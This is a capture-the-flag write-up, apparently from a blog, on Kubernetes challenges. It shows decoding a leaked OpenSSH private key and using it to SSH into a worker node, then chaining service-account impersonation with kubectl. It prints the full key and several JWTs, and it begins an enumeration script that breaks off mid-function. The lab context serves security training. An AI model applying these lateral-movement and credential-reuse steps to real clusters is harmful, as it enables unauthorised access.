key         LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFxa0RGdzhhd1BTMDE4K1pmLy9zU1lZSXl4aFRjR2VMbXY3WWppbTJXN1JZTDgxSEEraHZZClBpWkJVcjBkL0RZUGxuekZPNTBaMzNMQ1RoaEpCZnREalpyN0IvN3hWd3l3cDdGMy9XeE5LVTFkeUtGNmZyT3FTN3VvUm8KNWwzUHdvcGViYXZNS0ZZOExZc1NhZjYzV24wdVpxWGZYMGJldlp4a1JsWUxuS1ZzcDlJWWJZSmVkMkI3UzVNbmRuYkk4agpDWGhkWlV1Qlg0Mk5xb3B0bTBsWWo0NGxSK1JzRDFUcEdRS09SZUdRMzNFcU9UZjdOb3ROY1ZQaWJaa3ByWXErMTZHQk1ICm14RXM4THY4UWN1dTM3VnVWVk5JZkVXN2NZamNjN2xBejlBaFlFR1c5YWp5eWlkUzBBRG1IYTQ1TktycTRvNENKSkdMaVoKSzIyU3BpWHFLTE1XRjNndHRBWk1aVFUrZGJzcHZzZXg4ZWpMUmJ3NmhveENhY3g0WjNVZHBicDhQekFMaHJVVDdkS2dBQgo2bmxwZ2M0ejJpbVkxWW9CMER5eG9BQVpxb1QxbDdGSCtTbkFXeElUVysvTndkdTJTYWZRalpEMGxwa0FqaHlkcWFsb1RTCkZWbktpaHNWU29mRFhUOG14ZlBDUlJoSnFad2RUL242a3UxTFp3aWZBQUFGb0hkOWNJNTNmWENPQUFBQUIzTnphQzF5YzIKRUFBQUdCQUtwQXhjUEdzRDB0TmZQbVgvLzdFbUdDTXNZVTNCbmk1cisySTRwdGx1MFdDL05Sd1BvYjJENG1RVks5SGZ3MgpENVo4eFR1ZEdkOXl3azRZU1FYN1E0MmErd2YrOFZjTXNLZXhkLzFzVFNsTlhjaWhlbjZ6cWt1N3FFYU9aZHo4S0tYbTJyCnpDaFdQQzJMRW1uK3QxcDlMbWFsMzE5RzNyMmNaRVpXQzV5bGJLZlNHRzJDWG5kZ2UwdVRKM1oyeVBJd2w0WFdWTGdWK04KamFxS2JadEpXSStPSlVma2JBOVU2UmtDamtYaGtOOXhLamszK3phTFRYRlQ0bTJaS2EyS3Z0ZWhnVEI1c1JMUEM3L0VITApydCsxYmxWVFNIeEZ1M0dJM0hPNVFNL1FJV0JCbHZXbzhzb25VdEFBNWgydU9UU3E2dUtPQWlTUmk0bVN0dGtxWWw2aWl6CkZoZDRMYlFHVEdVMVBuVzdLYjdIc2ZIb3kwVzhPb2FNUW1uTWVHZDFIYVc2ZkQ4d0M0YTFFKzNTb0FBZXA1YVlIT005b3AKbU5XS0FkQThzYUFBR2FxRTlaZXhSL2twd0ZzU0UxdnZ6Y0hidGttbjBJMlE5SmFaQUk0Y25hbXBhRTBoVlp5b29iRlVxSAp3MTAvSnNYendrVVlTYW1jSFUvNStwTHRTMmNJbndBQUFBTUJBQUVBQUFHQU55TFM2UnduWnlpRkdIKzdCME5nS0lQcHZZCnh6MjA1SVBEM1lOTFJZOUY3M2I4MUNHYjE2d21YUk1lSmRHNWpHWTQzMHNlR214MTU2M3ArdXhta2c3M01KYVFWL1V4bWcKL0MzVkZoVkV4K051UTlOSHdGQ2ZEZmV2LzJtT1E0ckYvelJNRW1WTW5ZbzBjdXAzVCtIQ2YrSnZBQTd2SWNvSHROWGhudgptTU5aOU45dFdjbW1uako0dTNqa2h0RGhNczNaeEZZdENaRFVEaWFDQjhicFhLUUhOZ1QzQUNMdFRveUZpemlwNEtOTktKClFnNkhKSnJvY1pNZytTMW8rZks4WXI3ZkVrSjdPelAwSmJyK2IzK1ZsOVhPQmZCcnkrK1BjaUI1U3d5NTM5d2p3enNVU00KWXN1b3hiKzNXczVqK2ttdHdrQ3VYOVBUaWlXa0tCQTF3T2FHT3dwdFRYNmwrYklkZTlXdG5qT3ZwRTFLUlIxTWs5VWVHWQo3cVc4UzlIQS9ZMDRGZ1QrL1hGeGhNZ0JMRGRseU10SGZTL3BsdlgveDh0REsreW9jb3ByVEtDQ09weWxqNmR4N2V5dEVzClEwdGRUL0VxMHFmU0oreXp5aDFjYUJRU1UzUFFxekhLUk51Z1ArbWMrd1k1TzlxR01xdWYvSkthbFlpOEIrMnZvQkFBQUEKd1FDUXNYMndYcHFMS3U5VGtHWjJUajRXazBFTVdCUmZHUVBuTzFpUW1MT2ZhZkVMNW1yelFlalhZUjFRVHBQN1REbXJmegpZcTF6R3hsVkZtWXJWci9VQ3JUTTQ1Rkhub3NmTEJtVWtZSHRRZGdIeHhMbTBLK1dyVXVVb0FRbHZZcmJQeWhBZUhnVkIyCnhYK0dxa2Q5ZTl0NEt2MloyMTRDY0pqVWxBd2UvZ3RtWUQ3Qk1GT28rMTBRMWxaWjBwQm5QMzlUMUtVWWRVNFNJeHBQekUKOUY3U0JtQk5DQnBhQy9QSklKRTRvb3RmaWw5RkNBWDhWWHJ4TFRpSlVFd2FrUDdVOEFBQURCQUxXWEZDVTgvQ3owOUMvNQpHNzF1WS9PZURNaFIySnJVUmhQdHlwQmUxcEtvOHQrUk0rSUcyVWdjR245NlF0cDEzcjlWdWNZcVZ4TUR4dlg4eDNRdzEvCnpEN0E4M0pMWW9ac1U2Y2g2QWRMa0FVaE9CbDB4YVdkUWZqVStkR2syZmJ0M1BqTUVaVExGSDJuOW15MkdEcGVPVi9tbDgKT29OQkpqUmlYSVBWVm91a0VMek1qS0VGUWt6aEZHcmowTFVLNmwva2hxUVllQkJNd0NzZ0l2Q0hrSzFCSHJXekFJajJuQwpxc1c3bzBNQWk4UW5EdUZzVzNld1AxZEpjNmxaL01md0FBQU1FQThBUnIzMUE2a2hyQVQzRUZUV3QxaG5VOWVVR1RhSTJUCm96OGEvc2h2Q2xMZm9xekFjVEhndGtTaXNJK3UyNFBFbFU2YTB6YXFTY0s0c3dTVmVUU2p1bTV0akVudGdBc3UyTWZESkgKdDZaRWJ4VEpZRmMxQjd1ZDRtckdQcjdkdFJZZkhRcS9WOXE2T281Mmd3UFFycWljclRBdUdtaUZ2dzFNWmoxcWxBeGgyYQpGOE4yOUFXbVZKVXp3Z05BWjNPMEp5My9mYk5WQU1LZkFBZnkxSmVQd05vSTF5OVR0Y21MOWczZE1aWDhaSlhDZE9vdmMxCm1reWREMyttNWNTVFBoQUFBQUkybGhhVzVBZEdsdWRHRm5iR2xoTG5kdmNtc3VjMjFoY25SNVltOTVMbTVwYm1waEFRSUQKQkFVR0J3PT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
username    backup

root@entrypoint-deployment-776cc5bd94-nncdz:~# base64 -d <<< LS0tL[..SNIP..]
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqkDFw8awPS018+Zf//sSYYIyxhTcGeLmv7Yjim2W7RYL81HA+hvY
PiZBUr0d/DYPlnzFO50Z33LCThhJBftDjZr7B/7xVwywp7F3/WxNKU1dyKF6frOqS7uoRo
5l3PwopebavMKFY8LYsSaf63Wn0uZqXfX0bevZxkRlYLnKVsp9IYbYJed2B7S5MndnbI8j
CXhdZUuBX42Nqoptm0lYj44lR+RsD1TpGQKOReGQ33EqOTf7NotNcVPibZkprYq+16GBMH
mxEs8Lv8Qcuu37VuVVNIfEW7cYjcc7lAz9AhYEGW9ajyyidS0ADmHa45NKrq4o4CJJGLiZ
K22SpiXqKLMWF3gttAZMZTU+dbspvsex8ejLRbw6hoxCacx4Z3Udpbp8PzALhrUT7dKgAB
6nlpgc4z2imY1YoB0DyxoAAZqoT1l7FH+SnAWxITW+/Nwdu2SafQjZD0lpkAjhydqaloTS
FVnKihsVSofDXT8mxfPCRRhJqZwdT/n6ku1LZwifAAAFoHd9cI53fXCOAAAAB3NzaC1yc2
EAAAGBAKpAxcPGsD0tNfPmX//7EmGCMsYU3Bni5r+2I4ptlu0WC/NRwPob2D4mQVK9Hfw2
D5Z8xTudGd9ywk4YSQX7Q42a+wf+8VcMsKexd/1sTSlNXcihen6zqku7qEaOZdz8KKXm2r
zChWPC2LEmn+t1p9Lmal319G3r2cZEZWC5ylbKfSGG2CXndge0uTJ3Z2yPIwl4XWVLgV+N
jaqKbZtJWI+OJUfkbA9U6RkCjkXhkN9xKjk3+zaLTXFT4m2ZKa2KvtehgTB5sRLPC7/EHL
rt+1blVTSHxFu3GI3HO5QM/QIWBBlvWo8sonUtAA5h2uOTSq6uKOAiSRi4mSttkqYl6iiz
Fhd4LbQGTGU1PnW7Kb7HsfHoy0W8OoaMQmnMeGd1HaW6fD8wC4a1E+3SoAAep5aYHOM9op
mNWKAdA8saAAGaqE9ZexR/kpwFsSE1vvzcHbtkmn0I2Q9JaZAI4cnampaE0hVZyoobFUqH
w10/JsXzwkUYSamcHU/5+pLtS2cInwAAAAMBAAEAAAGANyLS6RwnZyiFGH+7B0NgKIPpvY
xz205IPD3YNLRY9F73b81CGb16wmXRMeJdG5jGY430seGmx1563p+uxmkg73MJaQV/Uxmg
/C3VFhVEx+NuQ9NHwFCfDfev/2mOQ4rF/zRMEmVMnYo0cup3T+HCf+JvAA7vIcoHtNXhnv
mMNZ9N9tWcmmnjJ4u3jkhtDhMs3ZxFYtCZDUDiaCB8bpXKQHNgT3ACLtToyFizip4KNNKJ
Qg6HJJrocZMg+S1o+fK8Yr7fEkJ7OzP0Jbr+b3+Vl9XOBfBry++PciB5Swy539wjwzsUSM
Ysuoxb+3Ws5j+kmtwkCuX9PTiiWkKBA1wOaGOwptTX6l+bIde9WtnjOvpE1KRR1Mk9UeGY
7qW8S9HA/Y04FgT+/XFxhMgBLDdlyMtHfS/plvX/x8tDK+yocoprTKCCOpylj6dx7eytEs
Q0tdT/Eq0qfSJ+yzyh1caBQSU3PQqzHKRNugP+mc+wY5O9qGMquf/JKalYi8B+2voBAAAA
wQCQsX2wXpqLKu9TkGZ2Tj4Wk0EMWBRfGQPnO1iQmLOfafEL5mrzQejXYR1QTpP7TDmrfz
Yq1zGxlVFmYrVr/UCrTM45FHnosfLBmUkYHtQdgHxxLm0K+WrUuUoAQlvYrbPyhAeHgVB2
xX+Gqkd9e9t4Kv2Z214CcJjUlAwe/gtmYD7BMFOo+10Q1lZZ0pBnP39T1KUYdU4SIxpPzE
9F7SBmBNCBpaC/PJIJE4ootfil9FCAX8VXrxLTiJUEwakP7U8AAADBALWXFCU8/Cz09C/5
G71uY/OeDMhR2JrURhPtypBe1pKo8t+RM+IG2UgcGn96Qtp13r9VucYqVxMDxvX8x3Qw1/
zD7A83JLYoZsU6ch6AdLkAUhOBl0xaWdQfjU+dGk2fbt3PjMEZTLFH2n9my2GDpeOV/ml8
OoNBJjRiXIPVVoukELzMjKEFQkzhFGrj0LUK6l/khqQYeBBMwCsgIvCHkK1BHrWzAIj2nC
qsW7o0MAi8QnDuFsW3ewP1dJc6lZ/MfwAAAMEA8ARr31A6khrAT3EFTWt1hnU9eUGTaI2T
oz8a/shvClLfoqzAcTHgtkSisI+u24PElU6a0zaqScK4swSVeTSjum5tjEntgAsu2MfDJH
t6ZEbxTJYFc1B7ud4mrGPr7dtRYfHQq/V9q6Oo52gwPQrqicrTAuGmiFvw1MZj1qlAxh2a
F8N29AWmVJUzwgNAZ3O0Jy3/fbNVAMKfAAfy1JePwNoI1y9TtcmL9g3dMZX8ZJXCdOovc1
mkydD3+m5cSTPhAAAAI2lhaW5AdGludGFnbGlhLndvcmsuc21hcnR5Ym95Lm5pbmphAQID
BAUGBw==
-----END OPENSSH PRIVATE KEY-----

Excellent, we have the private key and the username to use it with - backup. Let's try logging into the nodes to find the final flag.

root@entrypoint-deployment-776cc5bd94-nncdz:~# base64 -d <<< LS0t[..SNIP..] > privkey
root@entrypoint-deployment-776cc5bd94-nncdz:~# chmod 600 privkey
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl get node  -o wide
NAME       STATUS   ROLES           AGE   VERSION    INTERNAL-IP    EXTERNAL-IP   OS-IMAGE             KERNEL-VERSION   CONTAINER-RUNTIME
master-1   Ready    control-plane   38m   v1.28.11   10.0.252.74    <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
node-1     Ready    <none>          38m   v1.28.11   10.0.234.227   <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
node-2     Ready    <none>          38m   v1.28.11   10.0.194.36    <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
root@entrypoint-deployment-776cc5bd94-nncdz:~# ssh backup@10.0.252.74 -i privkey
The authenticity of host '10.0.252.74 (10.0.252.74)' can't be established.
ED25519 key fingerprint is SHA256:XeLpf01sJIW9cMRtmIV7y5Q/7ly3mmZ7n7eYyzYeUlc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.252.74' (ED25519) to the list of known hosts.
backup@10.0.252.74: Permission denied (publickey).
root@entrypoint-deployment-776cc5bd94-nncdz:~# ssh backup@10.0.234.227 -i privkey
The authenticity of host '10.0.234.227 (10.0.234.227)' can't be established.
ED25519 key fingerprint is SHA256:y5D1c6wo9z9DbPtedHIQGOsQH42RoTyrcO1+bgyOTCU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.234.227' (ED25519) to the list of known hosts.
                 _            _
 _ __   ___   __| | ___      / |
| '_ \ / _ \ / _` |/ _ \_____| |
| | | | (_) | (_| |  __/_____| |
|_| |_|\___/ \__,_|\___|     |_|


backup@node-1:~$

OK, so we couldn’t SSH into the master node, but we could get into the worker. Let’s see if we can find the flag somewhere within:

backup@node-1:~$ ls -alp
total 24
drwxr-xr-x 3 backup backup 4096 Jun 27 15:18 ./
drwxr-xr-x 5 root   root   4096 Jun 27 15:18 ../
-rw-r--r-- 1 backup backup  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 backup backup 3771 Jan  6  2022 .bashrc
-rw-r--r-- 1 backup backup  807 Jan  6  2022 .profile
drwx------ 2 backup backup 4096 Jun 27 15:18 .ssh/
backup@node-1:~$ ls -ap^C
backup@node-1:~$ cd .ssh/
backup@node-1:~/.ssh$ ls
authorized_keys
backup@node-1:~/.ssh$ ls -alp
total 12
drwx------ 2 backup backup 4096 Jun 27 15:18 ./
drwxr-xr-x 3 backup backup 4096 Jun 27 15:18 ../
-rw------- 1 backup backup  589 Jun 27 15:18 authorized_keys
backup@node-1:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqQMXDxrA9LTXz5l//+xJhgjLGFNwZ4ua/tiOKbZbtFgvzUcD6G9g+JkFSvR38Ng+WfMU7nRnfcsJOGEkF+0ONmvsH/vFXDLCnsXf9bE0pTV3IoXp+s6pLu6hGjmXc/Cil5tq8woVjwtixJp/rdafS5mpd9fRt69nGRGVgucpWyn0hhtgl53YHtLkyd2dsjyMJeF1lS4FfjY2qim2bSViPjiVH5GwPVOkZAo5F4ZDfcSo5N/s2i01xU+JtmSmtir7XoYEwebESzwu/xBy67ftW5VU0h8RbtxiNxzuUDP0CFgQZb1qPLKJ1LQAOYdrjk0qurijgIkkYuJkrbZKmJeoosxYXeC20BkxlNT51uym+x7Hx6MtFvDqGjEJpzHhndR2lunw/MAuGtRPt0qAAHqeWmBzjPaKZjVigHQPLGgABmqhPWXsUf5KcBbEhNb783B27ZJp9CNkPSWmQCOHJ2pqWhNIVWcqKGxVKh8NdPybF88JFGEmpnB1P+fqS7UtnCJ8= iain@tintaglia.work.smartyboy.ninja
backup@node-1:~/.ssh$ cd /
backup@node-1:/$ grep -ri flag_ctf
grep: lost+found: Permission denied
grep: home/player: Permission denied
grep: home/ubuntu: Permission denied
etc/passwd:flag_ctf{well_done_for_using_these_keys}

There we go - the final flag. It's not often you see challenges that make this kind of use of Vault.

Challenge 3 - Labyrinth

Moving on to the final challenge:

88888888888888888888888888888888888888888888888888888888888888888888888
88.._|      | `-.  | `.  -_-_ _-_  _-  _- -_ -  .'|   |.'|     |  _..88
88   `-.._  |    |`!  |`.  -_ -__ -_ _- _-_-  .'  |.;'   |   _.!-'|  88
88      | `-!._  |  `;!  ;. _______________ ,'| .-' |   _!.i'     |  88
88..__  |     |`-!._ | `.| |_______________||."'|  _!.;'   |     _|..88
88   |``"..__ |    |`";.| i|_|MMMMMMMMMMM|_|'| _!-|   |   _|..-|'    88
88   |      |``--..|_ | `;!|l|MMoMMMMoMMM|1|.'j   |_..!-'|     |     88
88   |      |    |   |`-,!_|_|MMMMP'YMMMM|_||.!-;'  |    |     |     88
88___|______|____!.,.!,.!,!|d|MMMo * loMM|p|,!,.!.,.!..__|_____|_____88
88      |     |    |  |  | |_|MMMMb,dMMMM|_|| |   |   |    |      |  88
88      |     |    |..!-;'i|r|MPYMoMMMMoM|r| |`-..|   |    |      |  88
88      |    _!.-j'  | _!,"|_|M<>MMMMoMMM|_||!._|  `i-!.._ |      |  88
88     _!.-'|    | _."|  !;|1|MbdMMoMMMMM|l|`.| `-._|    |``-.._  |  88
88..-i'     |  _.''|  !-| !|_|MMMoMMMMoMM|_|.|`-. | ``._ |     |``"..88
88   |      |.|    |.|  !| |u|MoMMMMoMMMM|n||`. |`!   | `".    |     88
88   |  _.-'  |  .'  |.' |/|_|MMMMoMMMMoM|_|! |`!  `,.|    |-._|     88
88  _!"'|     !.'|  .'| .'|[@]MMMMMMMMMMM[@] \|  `. | `._  |   `-._  88
88-'    |   .'   |.|  |/| /                 \|`.  |`!    |.|      |`-88
88      |_.'|   .' | .' |/                   \  \ |  `.  | `._    |  88
88     .'   | .'   |/|  /                     \ |`!   |`.|    `.  |  88
88  _.'     !'|   .' | /                       \|  `  |  `.    |`.|  88
88888888888888888888888888888888888888888888888888888888888888888888888

You've told us before that our challenges involve a lot of rinse-and-repeat RBAC. To prove that the other challenges aren't "just this", we've made this cluster just for you, dear player. Welcome to the labyrinth.

You have access to a service account. That service account can do some "things". You need to do those things over, and over, and over, and over, and over, and over. Eventually you'll be able to get secrets. Good luck, have fun.

This challenge will probably require some automation. If you want to work locally, you can make the Kubernetes API accessible on your local host by running `ssh -F simulator_config -L 8443:127.0.0.1:8443 bastion`

Here's a token to get you started.
eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDM4NDk5LCJpYXQiOjE3MTk1MDI0OTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwNjEwNn0sIm5iZiI6MTcxOTUwMjQ5OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.jdvVrObbj-M29qD0gTY6vEbxlfqht1-hrLNTQ18rlEVGvriOrfshblJk2yWRt6gg0KUjZMyOX08l8LO2Q3qdUgfZ-9CVVKClH5xEghSdqWPYhVfzJjrNUexE67Gbcyipic1HRmidGsy3YQoh-IzK0pNp9wy0fWRX24oZnrwzP97kYkP8ahZ2FYl4-WtklXvwWo6sUJVD9ubzEu4pIt1R5ZhN3xqMJLO9btNVHQ24GtXvYrrWzu27M3qH55rZxf9e4eiP9uwSd91pTPTiQlgZWxsKHIr73hu3fN4tQHOQNty91aKatvWD-0CcONcIcxm7jnQmc7veYN0tf9i3u0iwhA

Interesting - this is a concept Iain and I had discussed beforehand when throwing around ideas for future challenges, so I have an inkling of what might be needed here, though I wouldn't be surprised if he's made a few tweaks from what I expect. Let's have an initial look at our permissions:

root@entrypoint:~# kubectl get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:default:entrypoint" cannot list resource "secrets" in API group "" at the cluster scope
root@entrypoint:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     [entrypoint]     [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     [alvenakirlin]   [impersonate]

Right, so we are currently the entrypoint service account, and we can impersonate the alvenakirlin account. We can also create tokens for ourselves, and the token in the original message looks to be for the entrypoint account as well.
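
That's easy to sanity-check: the middle segment of a JWT is just base64url-encoded JSON, so we can decode the claims locally (no signature verification needed, we only care about the sub claim). A quick sketch:

import base64
import json

token = "eyJhbGciOiJSUzI1NiIsImtpZCI6..."  # the token from the challenge banner, truncated here

# The payload is the second dot-separated segment; pad it back out for base64 decoding
payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)
claims = json.loads(base64.urlsafe_b64decode(payload))

print(claims["sub"])  # system:serviceaccount:default:entrypoint

And indeed, using the provided token directly gives exactly the same result as our own credentials: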

root@entrypoint:~# kubectl --token eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDM4NDk5LCJpYXQiOjE3MTk1MDI0OTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwNjEwNn0sIm5iZiI6MTcxOTUwMjQ5OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.jdvVrObbj-M29qD0gTY6vEbxlfqht1-hrLNTQ18rlEVGvriOrfshblJk2yWRt6gg0KUjZMyOX08l8LO2Q3qdUgfZ-9CVVKClH5xEghSdqWPYhVfzJjrNUexE67Gbcyipic1HRmidGsy3YQoh-IzK0pNp9wy0fWRX24oZnrwzP97kYkP8ahZ2FYl4-WtklXvwWo6sUJVD9ubzEu4pIt1R5ZhN3xqMJLO9btNVHQ24GtXvYrrWzu27M3qH55rZxf9e4eiP9uwSd91pTPTiQlgZWxsKHIr73hu3fN4tQHOQNty91aKatvWD-0CcONcIcxm7jnQmc7veYN0tf9i3u0iwhA get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:default:entrypoint" cannot list resource "secrets" in API group "" at the cluster scope

Let’s impersonate alvenakirlin and see what it can do.

root@entrypoint:~# kubectl --as system:serviceaccount:default:alvenakirlin auth can-i --list
The connection to the server localhost:8080 was refused - did you specify the right host or port?

Of course… gotta love kubectl quirks - it seems passing --as (like other credential overrides) stops kubectl from falling back to the in-cluster config, so it defaults to localhost:8080 instead. Let's point it at the API server explicitly and hand it a token ourselves.

root@entrypoint:~# env
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=entrypoint
PWD=/root
HOME=/root
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
TERM=xterm
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
root@entrypoint:~# kubectl --server https://10.96.0.1 --insecure-skip-tls-verify --token $(kubectl create token entrypoint) --as system:serviceaccount:default:alvenakirlin auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     [alvenakirlin]   [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     [clarebartell]   [impersonate]
serviceaccounts                                 []                                     [michealblock]   [impersonate]

Right, so alvenakirlin can impersonate two more accounts - clarebartell and michealblock. This is going to be a branching-out exercise, isn't it? I can see why they say you should automate this. Let's set up the SSH port forward as documented in the introductory message and code something up to do the enumeration for us.

At the moment, it seems the lateral movement technique is just impersonating another service account. I wouldn't be surprised if that changes further down the chain to reading a secret or something similar, so the tooling will need to stay a bit flexible.

After some time, I came up with the following code - I’ve also added some comments to describe what I was doing with specific bits:

import subprocess
from pathlib import Path
import re

# The initial token
tokens = {
    "entrypoint": "eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDQxNDA3LCJpYXQiOjE3MTk1MDU0MDcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwOTAxNH0sIm5iZiI6MTcxOTUwNTQwNywic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.d5LXMdKhcmyDXujZbCWA5A31Ail-L2GMVK4tNKvRkD_i57hymeKkT1YThCkjzVrznblp_qNo-tiI416NOzy3qS-QNb46UzjsAgcwDmWa5jT-iJIaiaTEa6MM-pTWS_pzEyhs_31Ti5mhiLbqgKcEwQzsvs7ukae0j1ubJHbDJM3Ho71zylo2zW75UBIvN0DsllNT-OYSJTVMrOgzxeV95Zzc7L3oiHzN_Fj3TQEkN54Aph3__VX9hG8BhyaFqFiUsiJGmsYaNc9aqtbsb1bcJZcUrdVRif93Fk8hjtYPvR5m1Q9VfZmLvR1-RuNE42bFT1MKtC5OLNAMD_v5ErLSQg"
}

# A mapping of who can impersonate what, empty string was just there as a placeholder as we start with entrypoint
impersonate_mapping = {"entrypoint": ""}

# The list of accounts the script still needs to enumerate
todo = ["entrypoint"]

# Places on filesystem to store permissions and tokens
accounts = Path("accounts")
tokens_path = Path("tokens")

# A generic run command as user, so we can pass different commands as needed
def run_command(final_command, user):
    # if we don't have a token for the user, set the command up to authenticate as a user that can impersonate the target user
    if user not in tokens:
        impersonate = user
